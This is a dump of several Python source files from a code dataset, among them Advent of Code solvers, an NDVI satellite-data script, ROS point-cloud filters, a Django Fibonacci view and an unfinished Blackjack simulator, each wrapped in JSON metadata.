steps * energy_per_step(amphipod)\n\n limit_energy_memory[coords] = energy\n return energy\n\n\n# Do a move\ndef move_amphipod(coords, move: tuple):\n coords = dict(coords).copy()\n start, end, energy = move\n coords[start], coords[end] = '.', coords[start]\n return frozendict(coords)\n\n\ndef mini_energy_sort(burrow: list):\n coords, hallway_coords, room_coords = process_burrow(burrow)\n hallway_coords.remove('H2')\n hallway_coords.remove('H4')\n hallway_coords.remove('H6')\n hallway_coords.remove('H8')\n\n solution = {'H0': '.', 'H1': '.', 'H2': '.', 'H3': '.', 'H4': '.', 'H5': '.', 
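# --- Illustrative aside (not part of the original record) ---
# possible_moves above rebuilds the hallway-clearance check in four places.
# A minimal standalone sketch of that test, assuming coords maps the
# record's hex column keys 'H0'..'Ha' to '.' or an amphipod letter:
def hallway_clear(coords, a, b):
    lo, hi = (a + 1, b) if b > a else (b + 1, a)
    return all(coords['H%x' % x] == '.' for x in range(lo, hi))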
'H6': '.', 'H7': '.', 'H8': '.',\n 'H9': '.', 'Ha': '.', 'A0': 'A', 'A1': 'A', 'B0': 'B', 'B1': 'B', 'C0': 'C', 'C1': 'C', 'D0': 'D',\n 'D1': 'D'}\n\n coords = frozendict(coords)\n solution = frozendict(solution)\n\n connections = dict()\n connections[coords] = [0, None]\n\n mini_energy = limit_energy(coords, False)\n\n # Search all possible states\n while True:\n differences = False\n for start_coords in connections.copy():\n start_energy, end = connections[start_coords]\n\n # See if this node is the solution\n if start_coords == solution:\n mini_energy = min(mini_energy, start_energy)\n continue\n\n # See if this node has been searched\n if end:\n continue\n\n # See if this node is already above the solution energy\n if start_energy + limit_energy(start_coords) > mini_energy:\n continue\n\n end = list()\n\n # See every possible move we can make from here\n moves = possible_moves(start_coords, hallway_coords, room_coords)\n for m in moves:\n # Move consequences\n new_coords = move_amphipod(start_coords, m)\n new_energy = start_energy + m[2]\n\n # If we have seen this end state...\n if new_coords in connections:\n seen_energy, seen_children = connections[new_coords]\n delta_energy = new_energy - seen_energy\n\n # ...and the new energy is lower than the one we had found, then recursively lower the energy of all children states\n if delta_energy < 0:\n differences = True\n to_check = [(new_coords, delta_energy)]\n\n while len(to_check) > 0:\n parent_coords, delta_energy = to_check.pop()\n parent_energy, children = connections[parent_coords]\n\n connections[parent_coords] = [parent_energy + delta_energy, children]\n if not children:\n continue\n for child in children:\n child_coords, child_energy = child\n child_energy += delta_energy\n\n child_mini_energy, child_children = connections[child_coords]\n child_delta_energy = child_energy - child_mini_energy\n if child_delta_energy < 0:\n to_check += [(child_coords, child_delta_energy)]\n\n else:\n differences = True\n end += [(new_coords, new_energy)]\n connections[new_coords] = [new_energy, None]\n connections[start_coords] = [start_energy, end]\n\n if not differences:\n break\n print(f'\\nCurrent minimum energy: {mini_energy}')\n print(f'Current connections: {len(connections)}')\n\n return mini_energy\n\n\n# Tests and Solution ----------\nprint(mini_energy_sort(test01))\nprint(mini_energy_sort(puzzle))\n\n","sub_path":"2021/Day23/Day23-Prob1-Minimum-Energy-Sort.py","file_name":"Day23-Prob1-Minimum-Energy-Sort.py","file_ext":"py","file_size_in_byte":11023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"578413298","text":"#!/usr/bin/python3\n\n\"\"\"\n目标:提取时序NDVI数据\n\n输入:中国和美国国境内任意点的信息,包括以下两种形式:\n\t1. 经纬度描述的坐标点,以.json的文件形式输入,符合geojson的标准定义\n\t2. geojson描述的多边形,以.json的文件形式输入,符合geojson的标准定义\n\n输出:根据输入不同,给出不同的输出结果\n\t1. 由经纬度输入的,输出时序NDVI值,输出结果为以下格式:\n\t\t[(timestamp, value)]\n\t2. 
由多边形输入的,输出JPEG或PNG格式的NDVI图片,图片不用返回,只返回图片的文件路径即可,为以下格式\n\t\t[(timestamp, file_path)]\n\"\"\"\n\nfrom os.path import join\nimport time\nimport json\nimport os\n\nfrom RawDataIndex import RawDataIndex\nfrom ndvi_result_show import point_show\nfrom timingNDVI import timingNDVI\n\n\ndef point_process_timing(data_index): # 处理时序NDVI\n \"\"\"\n data_index:提出数据,保存位置的类\n \"\"\"\n lat = data_index.lat[0]\n lon = data_index.lon[0]\n sentinel_data = data_index.sentinel_data\n landsat_data = data_index.landsat_data\n data_index = None\n\n # 实例化timingDNVI类\n time_ndvi = timingNDVI()\n time_ndvi_result = []\n\n # 循环计算同一个点的sentinel NDVI\n for s in sentinel_data:\n calcu_data = time_ndvi._read_data(lat, lon, s) # 读数据\n if calcu_data is None:\n continue\n else:\n ndvi_result = time_ndvi.NDVI_generator(calcu_data) # 计算DNVI\n if ndvi_result is None:\n continue\n else:\n time_ndvi_result.append(ndvi_result) # 更新数据\n\n print(\"\\n Satellite Shoot time ndvi\\n\")\n print(\n \" %s %s \"\n % (\n time.strftime(\n \"%Y-%m-%dT%H:%M:%S\", time.localtime(time_ndvi.timestamp)\n ),\n time_ndvi.ndvi,\n )\n )\n\n time_ndvi_result = list(set(time_ndvi_result)) # 去除数据重复的影响\n time_ndvi_result.sort() # 数据按照时间排序\n\n sentinel_num = len(sentinel_data)\n sentinel_invaild_num = sentinel_num - len(time_ndvi_result) + 1\n print(\n \"Total find %s sentinel data and %s invaild.\"\n % (sentinel_num, sentinel_invaild_num)\n )\n\n # 循环计算landsat数据\n for l in landsat_data:\n calcu_data = time_ndvi._read_data(lat, lon, l) # 读数据\n if calcu_data is None:\n continue\n else:\n ndvi_result = time_ndvi.NDVI_generator(calcu_data) # 计算DNVI\n if ndvi_result is None:\n continue\n else:\n time_ndvi_result.append(ndvi_result) # 更新数据\n\n print(\"\\n Satellite Shoot time ndvi\\n\")\n print(\n \" %s %s \"\n % (\n time.strftime(\n \"%Y-%m-%dT%H:%M:%S\", time.localtime(time_ndvi.timestamp)\n ),\n time_ndvi.ndvi,\n )\n )\n\n time_ndvi = None\n\n time_ndvi_result = list(set(time_ndvi_result)) # 去除数据重复的影响\n time_ndvi_result.sort() # 数据按照时间排序\n\n landsat_num = len(landsat_data)\n landsat_invaild_num = (\n landsat_num - len(time_ndvi_result) + sentinel_num - sentinel_invaild_num\n )\n print(\n \"Total find %s landsat data and %s invaild.\"\n % (landsat_num, landsat_invaild_num)\n )\n\n return time_ndvi_result\n\n\ndef aoi_process_timing(data_index): # 处理aoi时序NDVI\n \"\"\"\n data_index = 所有测试文件路径,之后有李磊直接返回\n \"\"\"\n\n \"\"\"时序处理\"\"\"\n time_ndvi = timingNDVI()\n time_ndvi_result = []\n\n sentinel_data = data_index.sentinel_data\n landsat_data = data_index.landsat_data\n data_index = None\n\n for L in sentinel_data:\n ndvi_result = time_ndvi._read_roi_data(roi, L)\n if ndvi_result is None:\n continue\n else:\n time_ndvi_result.append(ndvi_result)\n\n for L in landsat_data:\n ndvi_result = time_ndvi._read_roi_data(roi, L)\n if ndvi_result is None:\n continue\n else:\n time_ndvi_result.append(ndvi_result)\n return time_ndvi_result\n\n\ndef load_json(json_file_path):\n with open(json_file_path, \"r\") as fp:\n tmp = json.load(fp)\n return tmp\n\n\ndef save_json(json_file_path, file_dict):\n with open(json_file_path, \"w\") as fp:\n json.dump(file_dict, fp, ensure_ascii=True, indent=2)\n\n\nif __name__ == \"__main__\":\n\n \"\"\"----------------------------------点时序测试----------------------------------\"\"\"\n\n start = time.time() # 计时\n testpoint = os.path.expanduser(\"~/data_pool/X_tmp/test_points2.geojson\")\n data_index = RawDataIndex(testpoint) # 实例化提取文件\n data_index.extract_data_path() # 执行提出文件\n time_ndvi_result = point_process_timing(data_index) # 
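# --- Illustrative aside (not part of the original record) ---
# save_json/load_json above round-trip the (timestamp, ndvi) tuples through
# JSON, which has no tuple type, so load_json returns lists of lists. A
# minimal self-contained sketch restoring the tuple shape after loading:
import json

def load_pairs(json_file_path):
    with open(json_file_path, 'r') as fp:
        return [tuple(item) for item in json.load(fp)]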
传入参数,进行计算\n\n # save data\n json_path = \"/home/tq/data_pool/X_tmp/test_points2.json\"\n save_json(json_path, time_ndvi_result)\n time_ndvi_result = load_json(json_path)\n print(\"\\nTotal %d point.\" % len(time_ndvi_result))\n # point_show(time_ndvi_result) # 结果显示\n\n end = time.time()\n print(end - start)\n\n \"\"\"----------------------------------ROI测试----------------------------------\"\"\"\n \"\"\"\n start = time.time() #计时\n # 处理序列ndvi\n \n roi = ([(116.797583649995, 40.0908842923383),\n (116.797927890475, 40.0880615643335),\n (116.802656544897, 40.0881352110320),\n (116.80214035494, 40.09062933034380),\n (116.797583649995, 40.0908842923383)])\n\n L1 = data_path = r'D:\\WorkSpace\\testData\\sentinel\\tiles\\50\\T\\MK\\2017\\11\\4'\n L2 = data_path = r'D:\\WorkSpace\\testData\\sentinel\\tiles\\50\\T\\MK\\2017\\11\\6'\n L3 = data_path = r'D:\\WorkSpace\\testData\\sentinel\\tiles\\50\\T\\MK\\2017\\11\\11'\n \n time_ndvi = timingNDVI()\n time_ndvi_result = []\n for L in [L1, L2, L3]:\n ndvi_result = time_ndvi._read_roi_data(roi, L)\n time_ndvi_result.append(ndvi_result)\n end = time.time()\n print(end-start)\n \"\"\"\n\n \"\"\"----------------------------------ROI时序测试----------------------------------\"\"\"\n # start = time.time() #计时\n\n # # 处理序列ndvi,test7,测试3\n # \"\"\"\n # roi = ([(116.797583649995, 40.0908842923383),\n # (116.797927890475, 40.0880615643335),\n # (116.802656544897, 40.0881352110320),\n # (116.80214035494, 40.09062933034380),\n # (116.797583649995, 40.0908842923383)])\n\n # \"\"\"\n # #问题3的区域,nb,区域2\n\n # roi = ([(-96.6201167117106, 40.5959476409038),\n # (-96.6200780868530, 40.5890096441085),\n # (-96.6201038363215, 40.5853660111447),\n # (-96.6109843256709, 40.5853171238444),\n # (-96.6109414103266, 40.5881199380235),\n # (-96.6129584315059, 40.5881688232751),\n # (-96.6129155161616, 40.5905478623315),\n # (-96.6109628679988, 40.5905641568277),\n # (-96.6109371185303, 40.5922196570490),\n # (-96.6108512878418, 40.5960095547692),\n # (-96.6201167117106, 40.5959476409038)])\n\n # \"\"\"初始化路径类\"\"\"\n # data_index = RawDataIndex()\n # data_index.extract_data_path() # 执行提出文件\n\n # time_ndvi_result = aoi_process_timing(data_index)\n # end = time.time()\n # print(end-start)\n\n # display the result\n # start = time.time() # 计时\n # json_path = \"/home/tq/data_pool/X_tmp/test_points2.json\"\n # time_ndvi_result = load_json(json_path)\n # print(\"\\nTotal %d point.\" % len(time_ndvi_result))\n # point_show(time_ndvi_result) # 结果显示\n\n # end = time.time()\n # print(end - start)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"92997154","text":"#!/usr/bin/env python\n\nfrom functools import reduce\n\ndef solve():\n with open(\"input.txt\") as input_file:\n lines = input_file.readlines()\n numbers = [int(num) for num in lines]\n candidates = [\n (x, y, z)\n for x in numbers\n for y in numbers\n for z in numbers\n ]\n print(f\"part2.results_length: {len(candidates)}\")\n solution = list(filter(lambda el: el[0] + el[1] + el[2] == 2020, candidates))\n print(f\"part2.solution: {solution}\")\n \n\n return reduce(lambda a,b: a*b, solution[0])\n\nif __name__ == \"__main__\":\n solve()\n","sub_path":"adventofcode/one/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"583821433","text":"#!/usr/bin/env python\n\n# 
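# --- Illustrative aside (not part of the original record) ---
# part2.py above materialises the full n^3 cartesian product before
# filtering. A minimal sketch of the same search over unordered triples,
# which also returns early on the first hit:
from functools import reduce
from itertools import combinations

def find_triple(numbers, target=2020):
    for triple in combinations(numbers, 3):
        if sum(triple) == target:
            return reduce(lambda a, b: a * b, triple)
    return None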
Author(s): Smruti Panigrahi\n\n# Import modules\nimport rospy\nimport pcl\nimport numpy as np\nimport ctypes\nimport struct\nimport sensor_msgs.point_cloud2 as pc2\n\nimport pcl_helper as pclh\nfrom sensor_msgs.msg import PointCloud2, PointField\nfrom std_msgs.msg import Header\nfrom random import randint\n\n\n\n\n# Statistical outlier filter\ndef statistical_filter_example():\n '''\n -*- coding: utf-8 -*-\n port of\n http://pointclouds.org/documentation/tutorials/statistical_outlier.php\n you need to download\n http://svn.pointclouds.org/data/tutorials/table_scene_lms400.pcd\n '''\n p = pcl.load(\"table_scene_lms400.pcd\")\n\n fil = p.make_statistical_outlier_filter()\n\n fil.set_mean_k(50)\n fil.set_std_dev_mul_thresh(1.0)\n pcl.save(fil.filter(), \"table_scene_lms400_inliers.pcd\")\n\n fil.set_negative(True)\n pcl.save(fil.filter(), \"table_scene_lms400_outliers.pcd\")\n\n\n# Statistical outlier filter\ndef statistical_outlier_filter(cloud, mean_k=50, std_dev_mul_thresh=0.1):\n # Create a Statistical Outlier Filter object to remove unwanted noise in point cloud\n sof = cloud.make_statistical_outlier_filter()\n\n sof.set_mean_k(mean_k)\n sof.set_std_dev_mul_thresh(std_dev_mul_thresh)\n \n filtered_inliers = sof.filter()\n #filename1 = 'table_filtered_statistical_inliers.pcd'\n #pcl.save(filtered_inliers, filename1)\n \n sof.set_negative(True)\n filtered_outliers = sof.filter()\n #filename2 = 'table_filtered_statistical_outliers.pcd'\n #pcl.save(filtered_outliers, filename2)\n\n return filtered_inliers, filtered_outliers\n\n\n# Voxel-grid down-sampling filter\ndef voxel_downsampling(cloud, LEAF_SIZE=0.005):\n # Create a VoxelGrid filter object for our input point cloud\n vox = cloud.make_voxel_grid_filter()\n # Set the voxel (or leaf) size \n vox.set_leaf_size(LEAF_SIZE, LEAF_SIZE, LEAF_SIZE)\n # Call the filter function to obtain the resultant downsampled point cloud\n cloud_filtered = vox.filter()\n #filename = 'voxel_downsampled.pcd'\n #pcl.save(cloud_filtered, filename)\n return cloud_filtered\n\n\n# Pass-through filter\ndef pass_through_filter(cloud_vox_filtered, axis_min=0.77, axis_max=1.1, filter_axis='z'):\n # Create a PassThrough filter object to create a bounding box\n cloud_psf = cloud_vox_filtered.make_passthrough_filter()\n cloud_psf.set_filter_field_name(filter_axis)\n cloud_psf.set_filter_limits(axis_min, axis_max)\n\n # Finally use the filter function to obtain the resultant point cloud. 
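# --- Illustrative aside (not part of the original record) ---
# A minimal usage sketch chaining the three filters defined above, assuming
# a local tabletop.pcd and that the record's helper functions are in scope:
import pcl

cloud = pcl.load('tabletop.pcd')
inliers, _ = statistical_outlier_filter(cloud, mean_k=50,
                                        std_dev_mul_thresh=0.1)
downsampled = voxel_downsampling(inliers, LEAF_SIZE=0.005)
sliced = pass_through_filter(downsampled, axis_min=0.77, axis_max=1.1)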
\n cloud_filtered = cloud_psf.filter()\n #filename = 'cloud_psf.pcd'\n #pcl.save(cloud_filtered, filename)\n return cloud_filtered\n\n\n# RANSAC plane segmentation\ndef ransac(cloud_psf, max_distance=0.01):\n # Create the segmentation object\n seg = cloud_psf.make_segmenter()\n\n # Set the model you wish to fit\n seg.set_model_type(pcl.SACMODEL_PLANE)\n seg.set_method_type(pcl.SAC_RANSAC)\n \n seg.set_distance_threshold(max_distance)\n\n # Call the segment function to obtain set of inlier indices and model coefficients\n inliers, coefficients = seg.segment()\n\n # Extract inliers\n extracted_inliers = cloud_psf.extract(inliers, negative=False)\n #filename = 'extracted_inliers.pcd'\n #pcl.save(extracted_inliers, filename) # Save pcd for table\n\n # Extract outliers\n extracted_outliers = cloud_psf.extract(inliers, negative=True)\n #filename = 'extracted_outliers.pcd'\n #pcl.save(extracted_outliers, filename) # Save pcd for tabletop objects\n\n return extracted_inliers, extracted_outliers\n\n\n# Euclidean clustering algorithm to segment the RANSAC inlier points into individual objects.\ndef euclidean_clustering(cloud):\n # Convert XYZRGB point cloud to XYZ since EC uses spatial info only\n cloud_xyz = pclh.XYZRGB_to_XYZ(cloud)\n # Use k-d tree to decrease the computational burden of searching for neighboring points\n tree = cloud_xyz.make_kdtree()\n # Create a cluster extraction object\n ec = cloud_xyz.make_EuclideanClusterExtraction()\n # Set tolerances for distance threshold \n # as well as minimum and maximum cluster size (in points)\n # NOTE: These are poor choices of clustering parameters\n # Your task is to experiment and find values that work for segmenting objects.\n ec.set_ClusterTolerance(0.01)\n ec.set_MinClusterSize(10)\n ec.set_MaxClusterSize(10000)\n # Search the k-d tree for clusters\n ec.set_SearchMethod(tree)\n # Extract indices for each of the discovered clusters\n cluster_indices = ec.Extract()\n\n return cluster_indices\n\n\ndef visualize_clusters(cloud, cluster_indices):\n #cloud_xyz = pclh.XYZRGB_to_XYZ(cloud)\n #Assign a color corresponding to each segmented object in scene\n cluster_color = pclh.get_color_list(len(cluster_indices))\n color_cluster_point_list = []\n for j, indices in enumerate(cluster_indices):\n color = pclh.rgb_to_float(cluster_color[j])\n for idx in indices:\n p = cloud[idx]\n color_cluster_point_list.append([p[0], p[1], p[2], color])\n\n #Create new cloud containing all clusters, each with unique color\n cluster_cloud = pcl.PointCloud_PointXYZRGB()\n cluster_cloud.from_list(color_cluster_point_list)\n\n return cluster_cloud\n\n\n\ndef main(): \n # Run the following on command line inside the folder where the .pcd file resides\n # pcl_viewer tabletop.pcd\n\n # Load Point Cloud file\n cloud = pcl.load('tabletop.pcd')\n\n stat_inliers, stat_outliers = statistical_outlier_filter(cloud)\n clFil = voxel_downsampling(stat_inliers)\n psFil = pass_through_filter(clFil)\n RANSAC_inliers, RANSAC_outliers = ransac(psFil)\n #statistical_filter_example()\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"sensor_stick/scripts/filtering.py","file_name":"filtering.py","file_ext":"py","file_size_in_byte":5715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"301468985","text":"import re\nimport time\nfrom django.shortcuts import render_to_response, RequestContext, Http404, redirect\nfrom django.contrib import messages \n\nfrom .models import NthFibo\nfrom .forms import NthNumberForm\n\ndef 
get_nth_fibo(n):\n '''\n function to get nth number in fibonacci sequence\n '''\n first, second, result = 0, 1, 0\n if n == 0:\n return first\n for _ in xrange(2, n+1):\n result = first + second\n first = second\n second = result\n return second\n\ndef nth_number(request):\n start_time = time.time()\n nform = NthNumberForm()\n if request.method == 'POST':\n nform = NthNumberForm(request.POST) \n if nform.is_valid():\n n = nform.cleaned_data['n']\n if re.match('^[0-9]+$', n) and not re.match('^-[0-9]+$', n):\n if NthFibo.objects.filter(n=n).exists():\n ans = NthFibo.objects.get(n=n).answer\n else:\n ans = get_nth_fibo(int(n))\n NthFibo.objects.create(n=n, answer=str(ans))\n calc_time = (time.time() - start_time) / 1000.0\n return render_to_response(\"solver/answer.html\", locals(), context_instance=RequestContext(request))\n else:\n messages.error(request, \"Invalid Input\")\n return redirect('nth_number') \n else:\n messages.error(request, \"There was an error with your number\")\n return redirect('nth_number') \n else:\n return render_to_response(\"solver/find.html\", locals(), context_instance=RequestContext(request))\n","sub_path":"solver/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"179668981","text":"import random\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\n\r\n\r\nclass Card(object):\r\n \"\"\"Create a playing card object\r\n \"\"\"\r\n suit_names = [\"Joker\",\"Diamonds\",\"Clubs\",\"Hearts\",\"Spades\"]\r\n rank_names = ['Joker','Ace','2','3','4','5','6','7','8','9','10','Jack','Queen','King']\r\n \r\n def __init__(self,suit=0,rank=0):\r\n \"create a new card\"\r\n self.suit = suit\r\n self.rank = rank\r\n self.rankname = Card.rank_names[self.rank]\r\n\r\n def __str__(self):\r\n \"returns a string represenatation of the card created\"\r\n return '%s of %s' %(Card.rank_names[self.rank],Card.suit_names[self.suit])\r\n\r\n def __repr__(self):\r\n \"returns a string represenatation of the card created\"\r\n return '%s of %s' %(Card.rank_names[self.rank],Card.suit_names[self.suit])\r\n\r\n\r\nclass Deck(object):\r\n \"Create a Full Deck of Cards\"\r\n\r\n def __init__(self,inc_jok = False):\r\n self.rand = random.Random()\r\n self.inc_jok = inc_jok\r\n self.deck_of_cards = []\r\n if self.inc_jok == True:\r\n for i in range(1,5): \r\n for j in range(1,14):\r\n card = Card(i,j)\r\n self.deck_of_cards.append(card)\r\n self.deck_of_cards.append(Card(0,0))\r\n self.deck_of_cards.append(Card(0,0))\r\n elif self.inc_jok == False:\r\n for i in range(1,5):\r\n for j in range(1,14):\r\n card = Card(i,j)\r\n self.deck_of_cards.append(card)\r\n\r\n def __str__(self):\r\n string_cards = []\r\n for i in self.deck_of_cards:\r\n string_cards.append(str(i))\r\n return '\\n'.join(string_cards)\r\n\r\n def __repr__(self):\r\n string_cards = []\r\n for i in self.deck_of_cards:\r\n string_cards.append(str(i))\r\n return '\\n'.join(string_cards) \r\n\r\n def shuffle(self,random_seed = 42,set_seed = False):\r\n if set_seed == True:\r\n self.rand = random.Random(random_seed) \r\n self.rand = random.Random(random_seed) \r\n self.rand.shuffle(self.deck_of_cards)\r\n\r\n def add_card(self,card):\r\n self.deck_of_cards.append(card)\r\n\r\n def remove_card(self,card):\r\n self.deck_of_cards.remove(card)\r\n\r\n def pop_card(self,i=-1):\r\n return self.deck_of_cards.pop(i)\r\n\r\n def deal_card(self,hand,num):\r\n \"Deals number of cards to a given hand\"\r\n if num 
== 1:\r\n card = self.pop_card()\r\n hand.add_card(card)\r\n cards_dealt = card\r\n\r\n else:\r\n cards_dealt = []\r\n for i in range(num):\r\n card = self.pop_card()\r\n hand.add_card(card)\r\n cards_dealt.append(card)\r\n\r\n return cards_dealt\r\n\r\nclass Hand(Deck):\r\n \"\"\"Creates a hand of playing cards.\"\"\"\r\n \r\n def __init__(self, label=''):\r\n self.deck_of_cards = []\r\n self.label = label\r\n\r\n def __str__(self):\r\n return self.label + ' currently has hand \\n' + str(self.deck_of_cards) \r\n\r\n def update_label(self,newlabel):\r\n self.label = newlabel\r\n\r\n\r\n\r\nclass Blackjack():\r\n \r\n \"\"\"Sets up a game of Blackjack\"\"\"\r\n bet_tables_no_ace = []\r\n for row in range(22):\r\n if row >= 0 and row <=4:\r\n temp = ['Hit','Hit','Hit','Hit','Hit','Hit','Hit','Hit','Hit','Hit','Hit']\r\n bet_tables_no_ace.append(temp)\r\n elif row >= 5 and row <= 8:\r\n temp = ['Hit','Hit','Hit','Hit','Hit','Hit','Hit','Hit','Hit','Hit','Hit']\r\n bet_tables_no_ace.append(temp)\r\n elif row == 9:\r\n temp = ['Hit','Hit','Hit','Double','Double','Double','Double','Hit','Hit','Hit','Hit']\r\n bet_tables_no_ace.append(temp)\r\n elif row == 10:\r\n temp = ['Double','Hit','Double','Double','Double','Double','Double','Double','Double','Double','Hit']\r\n bet_tables_no_ace.append(temp)\r\n elif row == 11:\r\n temp = ['Double','Double','Double','Double','Double','Double','Double','Double','Double','Double','Double']\r\n bet_tables_no_ace.append(temp)\r\n elif row == 12:\r\n temp = ['Hit','Hit','Hit','Hit','Stand','Stand','Stand','Hit','Hit','Hit','Hit']\r\n bet_tables_no_ace.append(temp)\r\n elif row >= 13 and row <= 16:\r\n temp = ['Stand','Hit','Stand','Stand','Stand','Stand','Stand','Hit','Hit','Hit','Hit']\r\n bet_tables_no_ace.append(temp)\r\n elif row >= 17:\r\n temp = ['Stand','Stand','Stand','Stand','Stand','Stand','Stand','Stand','Stand','Stand','Stand']\r\n bet_tables_no_ace.append(temp)\r\n\r\n bet_tables_ace = []\r\n for row in range(14):\r\n if row >= 0 and row <=3:\r\n temp = ['Hit','Hit','Hit','Hit','Hit','Double','Double','Hit','Hit','Hit','Hit']\r\n bet_tables_ace.append(temp)\r\n elif row == 4 or row == 5:\r\n temp = ['Hit','Hit','Hit','Hit','Double','Double','Double','Hit','Hit','Hit','Hit']\r\n bet_tables_ace.append(temp)\r\n elif row == 6:\r\n temp = ['Hit','Hit','Hit','Double','Double','Double','Double','Hit','Hit','Hit','Hit']\r\n bet_tables_ace.append(temp)\r\n elif row == 7:\r\n temp = ['Hit','Hit','Double','Double','Double','Double','Double','Stand','Stand','Hit','Hit']\r\n bet_tables_ace.append(temp)\r\n elif row == 8:\r\n temp = ['Stand','Stand','Stand','Stand','Stand','Stand','Double','Stand','Stand','Stand','Stand']\r\n bet_tables_ace.append(temp)\r\n elif row >=9 and row <=13:\r\n temp = ['Stand','Stand','Stand','Stand','Stand','Stand','Stand','Stand','Stand','Stand','Stand']\r\n bet_tables_ace.append(temp)\r\n\r\n bet_tables_pairs = []\r\n for row in range(14):\r\n if row == 1 or row == 0:\r\n temp = ['Split','Split','Split','Split','Split','Split','Split','Split','Split','Split','Split']\r\n bet_tables_pairs.append(temp)\r\n elif row == 2 or row == 3:\r\n temp = ['Split','Hit','Split','Split','Split','Split','Split','Split','Hit','Hit','Hit']\r\n bet_tables_pairs.append(temp)\r\n elif row == 4:\r\n temp = ['Hit','Hit','Hit','Hit','Hit','Split','Split','Hit','Hit','Hit','Hit']\r\n bet_tables_pairs.append(temp)\r\n elif row == 5:\r\n temp = ['','','','','','','','','','','']\r\n bet_tables_pairs.append(temp)\r\n elif row == 6:\r\n temp = 
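# --- Illustrative aside (not part of the original record) ---
# Deck.shuffle above reseeds self.rand unconditionally, so its set_seed flag
# has no effect and every default-argument shuffle repeats the same order.
# A minimal sketch of the presumably intended behaviour:
import random

def shuffle(self, random_seed=42, set_seed=False):
    if set_seed:
        self.rand = random.Random(random_seed)  # reseed only when asked
    self.rand.shuffle(self.deck_of_cards)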
['Split','Hit','Split','Split','Split','Split','Split','Hit','Hit','Hit','Hit']\r\n bet_tables_pairs.append(temp)\r\n elif row == 7:\r\n temp = ['Split','Hit','Split','Split','Split','Split','Split','Split','Hit','Hit','Hit']\r\n bet_tables_pairs.append(temp)\r\n elif row == 8:\r\n temp = ['Split','Split','Split','Split','Split','Split','Split','Split','Split','Split','Split']\r\n bet_tables_pairs.append(temp)\r\n elif row == 9:\r\n temp = ['Hit','Stand','Split','Split','Split','Split','Split','Stand','Split','Split','Stand']\r\n bet_tables_pairs.append(temp)\r\n elif row >= 10 and row <=13:\r\n temp = ['Stand','Stand','Stand','Stand','Stand','Stand','Stand','Stand','Stand','Stand','Stand']\r\n bet_tables_pairs.append(temp)\r\n\r\n surrender_table = []\r\n for row in range(22):\r\n empty = ['0','1','2','3','4','5','6','7','8','9','10']\r\n surrender_table.append(empty)\r\n\r\n def __init__(self,num_of_players = 1,num_of_decks = 6,use_surrender = True,use_count = True,use_count_multiplier = True,soft17hit = True,penetration_point = .1,random_seed = 42): #,num_of_players=1,num_of_decks=1): \r\n self.num_of_players = num_of_players\r\n self.num_of_decks = num_of_decks\r\n self.hand_scores = [ [[]] for i in range(self.num_of_players+1)]\r\n self.round_scores = [0,0]\r\n self.discardpile = Hand('Discard Pile')\r\n self.decks = []\r\n self.players = []\r\n self.did_double = [ [False] for i in range(self.num_of_players+1)]\r\n self.count = 0\r\n self.true_count = 0\r\n self.winnings = 0.0\r\n self.bet = 10.0\r\n self.count_multiplier = 1\r\n self.surrendered = [ [False] for i in range(self.num_of_players+1)]\r\n self.Insurance = False\r\n self.use_surrender_variable = use_surrender\r\n\r\n self.blackjack_count = 0\r\n\r\n self.surrender_count = 0\r\n self.double_count = 0\r\n self.split_count = 0\r\n self.insurance_count = 0\r\n self.use_count = use_count\r\n self.use_count_multiplier = use_count_multiplier\r\n self.soft17hit = soft17hit\r\n\r\n self.dealer_bust_count = 0\r\n\r\n self.soft17 = False\r\n self.prints = False\r\n self.count_array = []\r\n self.reshuffle_total = 0\r\n self.expected_count = 0\r\n self.start_value = 0\r\n self.penetration_point = int(penetration_point*num_of_decks*52)\r\n self.max_count_array = []\r\n self.mean_count_array = []\r\n self.random_seed = random_seed\r\n self.winnings_array = [0.0]\r\n self.round_count = [1]\r\n self.count_array_tracker = [0]\r\n\r\n self.deck = Deck(False)\r\n for i in range(self.num_of_decks-1):\r\n d = Deck(False)\r\n d.deal_card(self.deck,len(d.deck_of_cards))\r\n \r\n self.deck.shuffle(self.random_seed,True)\r\n\r\n dealer = [Hand('Dealer')]\r\n self.players.append(dealer)\r\n for i in range(self.num_of_players):\r\n j = i + 1\r\n label = 'Player %s' %(str(j))\r\n self.player = [Hand(label)]\r\n self.players.append(self.player)\r\n\r\n self.variations(self.true_count,self.use_count)\r\n self.use_surrender(self.use_surrender_variable)\r\n\r\n def deal(self):\r\n\r\n for i in range(2):\r\n j = 1\r\n while j <= self.num_of_players:\r\n self.count_card(self.deck.deal_card(self.players[j][0],1))\r\n j = j+1\r\n\r\n self.deck.deal_card(self.players[0][0],1)\r\n\r\n\r\n\r\n def __str__(self):\r\n return 'Current hands won: \\n Dealer: %s \\n Player 1: %s' %(str(self.scores[0]),str(self.scores[1]))\r\n \r\n def ace_check(self,s = 0,h = []):\r\n if s > 21:\r\n for i,val in enumerate(h):\r\n if val == 11:\r\n val = 1\r\n h[i] = val\r\n return h\r\n\r\n def blackjack_check(self,score,playernumber,handnumber = 0):\r\n if 
